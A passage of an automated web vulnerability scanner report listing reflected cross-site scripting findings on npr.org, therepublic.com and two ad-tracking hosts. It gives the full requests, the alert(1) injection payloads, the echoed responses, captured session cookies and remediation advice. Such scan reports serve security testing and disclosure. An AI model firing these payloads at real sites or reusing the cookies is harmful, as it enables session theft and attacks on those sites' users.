HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=5933FD8D8BF7327889B529C2C6310415; Path=/
Content-Length: 2071
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
;
document.lastChild.firstChild.appendChild(stylesheet);
}

function requestContent( local ) {

var script = document.createElement('script');
script.src = CONTENT_URL + '?t=266fb33';alert(1)//711c8836387&f=f&url=' + escape(local || location.href);
document.getElementsByTagName('head')[0].appendChild(script);
}

   this.init = function() {
    this.serverResponse = function(data) {
    if (!d
...[SNIP]...

2.132. http://www.npr.org/templates/reg/forgot-password-submit.php [public_user_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg/forgot-password-submit.php

Issue detail

The value of the public_user_email request parameter is copied into the HTML document as plain text between tags. The payload 933d3<script>alert(1)</script>6ad288fa3a4c51ff5 was submitted in the public_user_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /templates/reg/forgot-password-submit.php?public_user_email=933d3<script>alert(1)</script>6ad288fa3a4c51ff5&x=29&y=11 HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/forgot-password.php
Cache-Control: max-age=0
Origin: http://www.npr.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:40:54 GMT
Content-Type: text/html
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 12982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Forgot your p
...[SNIP]...
<strong>933d3<script>alert(1)</script>6ad288fa3a4c51ff5</strong>
...[SNIP]...

2.133. http://www.therepublic.com/assets/gzip.php [f0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f0 request parameter is copied into a JavaScript rest-of-line comment. The payload fd9b1%0aalert(1)//706f6bd3266 was submitted in the f0 parameter. This input was echoed as fd9b1
alert(1)//706f6bd3266
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.jsfd9b1%0aalert(1)//706f6bd3266&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:39 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 145899

// FILE NOT FOUND 'scripts/jquery/js/jquery-1.3.2.min.jsfd9b1
alert(1)//706f6bd3266
'

(function ($) {
$.fn.fadeTransition = function(options) {
var options = $.extend({pauseTime: 5000, transitionTime: 2000}, options);

Trans = function(obj) {
var timer = null;

...[SNIP]...

2.134. http://www.therepublic.com/assets/gzip.php [f0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f0 request parameter is copied into the HTML document as plain text between tags. The payload a75b1<img%20src%3da%20onerror%3dalert(1)>8444697b20 was submitted in the f0 parameter. This input was echoed as a75b1<img src=a onerror=alert(1)>8444697b20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.cssa75b1<img%20src%3da%20onerror%3dalert(1)>8444697b20&f1=scripts/menu/menu.css&f2=css/style.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:34 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 19325

// FILE NOT FOUND 'scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.cssa75b1<img src=a onerror=alert(1)>8444697b20'

div#menu{height:41px;background:url(http://hnemanagement.com/trassets/scripts/menu/images/main-bg.png) repeat-x;}
div#menu ul{margin:0;padding:0;list-style:none;float:left;}
div#menu ul.menu{padding
...[SNIP]...

2.135. http://www.therepublic.com/assets/gzip.php [f1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9bb"%3balert(1)//3fa72bc3ee4 was submitted in the f1 parameter. This input was echoed as 1c9bb";alert(1)//3fa72bc3ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js1c9bb"%3balert(1)//3fa72bc3ee4&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:40 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 202184

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
"offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();// FILE NOT FOUND 'scripts/jquery/js/jquery.fadetransition.js1c9bb";alert(1)//3fa72bc3ee4'

/*
* jQuery UI 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquer
...[SNIP]...

2.136. http://www.therepublic.com/assets/gzip.php [f1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f1 request parameter is copied into the HTML document as plain text between tags. The payload 31990<img%20src%3da%20onerror%3dalert(1)>b9261ac9e98 was submitted in the f1 parameter. This input was echoed as 31990<img src=a onerror=alert(1)>b9261ac9e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css31990<img%20src%3da%20onerror%3dalert(1)>b9261ac9e98&f2=css/style.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:36 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 39249

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
ted a{cursor:pointer;}
.ui-tabs .ui-tabs-panel{padding:1em 1.4em;display:block;border-width:0;background:none;}
.ui-tabs .ui-tabs-hide{display:none !important;}
// FILE NOT FOUND 'scripts/menu/menu.css31990<img src=a onerror=alert(1)>b9261ac9e98'

body{margin-top:0px;margin-right:0px;margin-left:0px;font-family:Verdana, Arial, Helvetica, sans-serif;font-size:expression(screen.deviceXDPI >
...[SNIP]...

2.137. http://www.therepublic.com/assets/gzip.php [f2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f2 request parameter is copied into the HTML document as plain text between tags. The payload e3a85<img%20src%3da%20onerror%3dalert(1)>bdd1e370341 was submitted in the f2 parameter. This input was echoed as e3a85<img src=a onerror=alert(1)>bdd1e370341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css&f2=css/style.csse3a85<img%20src%3da%20onerror%3dalert(1)>bdd1e370341 HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:37 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 24933

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
/menu/images/lava.png) no-repeat top left !important;background-image:url(http://hnemanagement.com/trassets/scripts/menu/images/lava.gif);height:44px;margin-right:8px;}
// FILE NOT FOUND 'css/style.csse3a85<img src=a onerror=alert(1)>bdd1e370341'


2.138. http://www.therepublic.com/assets/gzip.php [f2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5be3"%3balert(1)//d085caec6b1 was submitted in the f2 parameter. This input was echoed as a5be3";alert(1)//d085caec6b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.jsa5be3"%3balert(1)//d085caec6b1&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:40 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 71404

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
seTime);
};

cue();
}

return this.each(function() {
var t = new Trans(this);
});
}
})(jQuery);

// FILE NOT FOUND 'scripts/jquery/js/jquery-ui-1.7.2.custom.min.jsa5be3";alert(1)//d085caec6b1'

/** jquery.color.js ****************/
/*
* jQuery Color Animations
* Copyright 2007 John Resig
* Released under the MIT and GPL licenses.
*/

(function(jQuery){

   // We override the animation fo
...[SNIP]...

2.139. http://www.therepublic.com/assets/gzip.php [f3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f3 request parameter is copied into a JavaScript rest-of-line comment. The payload b0ea5%0aalert(1)//a9a972eae26 was submitted in the f3 parameter. This input was echoed as b0ea5
alert(1)//a9a972eae26
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.jsb0ea5%0aalert(1)//a9a972eae26 HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:41 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 190058

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
ects.restore(e,d);if(h=="show"&&a.browser.msie){this.style.removeAttribute("filter")}if(b.callback){b.callback.apply(this,arguments)}e.dequeue()}})})}})(jQuery);;// FILE NOT FOUND 'scripts/menu/menu.jsb0ea5
alert(1)//a9a972eae26
'


2.140. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 32c0d%0aalert(1)//b26abd85278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32c0d
alert(1)//b26abd85278
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/men/32c0d%0aalert(1)//b26abd85278u.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:42 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 190059

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
effects.restore(e,d);if(h=="show"&&a.browser.msie){this.style.removeAttribute("filter")}if(b.callback){b.callback.apply(this,arguments)}e.dequeue()}})})}})(jQuery);;// FILE NOT FOUND 'scripts/menu/men/32c0d
alert(1)//b26abd85278
u.js'


2.141. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9454e<img%20src%3da%20onerror%3dalert(1)>a76a89d3b38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9454e<img src=a onerror=alert(1)>a76a89d3b38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css&f2=css/style/9454e<img%20src%3da%20onerror%3dalert(1)>a76a89d3b38.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:38 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 24934

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
pts/menu/images/lava.png) no-repeat top left !important;background-image:url(http://hnemanagement.com/trassets/scripts/menu/images/lava.gif);height:44px;margin-right:8px;}
// FILE NOT FOUND 'css/style/9454e<img src=a onerror=alert(1)>a76a89d3b38.css'


2.142. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotes (the jsref property of adsafeVisParams). The payload 95704"-alert(1)-"f83d1186636 was submitted in the Referer HTTP header and echoed unmodified, so the embedded double quote terminates the literal and -alert(1)- is evaluated as part of the expression.

This proof-of-concept attack demonstrates that arbitrary JavaScript can be injected into the application's response, which is served as text/javascript.

Because the reflected data arrives in a request header, the flaw is not trivial to exploit against another user: the attacker needs a way to make the victim's browser send a crafted Referer. Historically, client-side plugins such as Flash could issue requests with attacker-chosen headers, and where such a technique is available it can be combined with this reflection. The Referer is also derived from the URL of the linking page, so whether a link from an attacker-controlled page suffices depends on how the victim's browser encodes quote characters in the URL it sends. These constraints partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous and cannot be made safe with HTML encoding alone. If at all possible, the application should not echo the Referer into script. Where a value must be embedded, serialise it with a JSON encoder and additionally escape <, >, & and the U+2028/U+2029 line terminators, so the output can neither close the string literal nor the enclosing script element.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95704"-alert(1)-"f83d1186636
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BE57AD10F09BB732E508295DF3E17613; Path=/
Content-Type: text/javascript
Content-Length: 8047
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=95704"-alert(1)-"f83d1186636",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3
...[SNIP]...

2.143. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the response without encoding. The payload b640b<script>alert(1)</script>fe55219a755 was submitted in the C3UID cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response body shown below is JavaScript and the value lands inside a single-quoted string literal (the c3VJSuid assignment). Because the response is nevertheless served as text/html, the <script> payload does execute if a browser renders the response as a document, which is what this proof-of-concept demonstrates. When the file is loaded through a script element instead, a <script> tag inside a string literal is inert, and the test that matters is whether a single quote in the cookie value survives unencoded; this report does not show that case.

Because the reflected data arrives in a cookie, exploiting it against another user is not trivial: the attacker first needs a means of setting an arbitrary C3UID value in the victim's browser for this domain. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
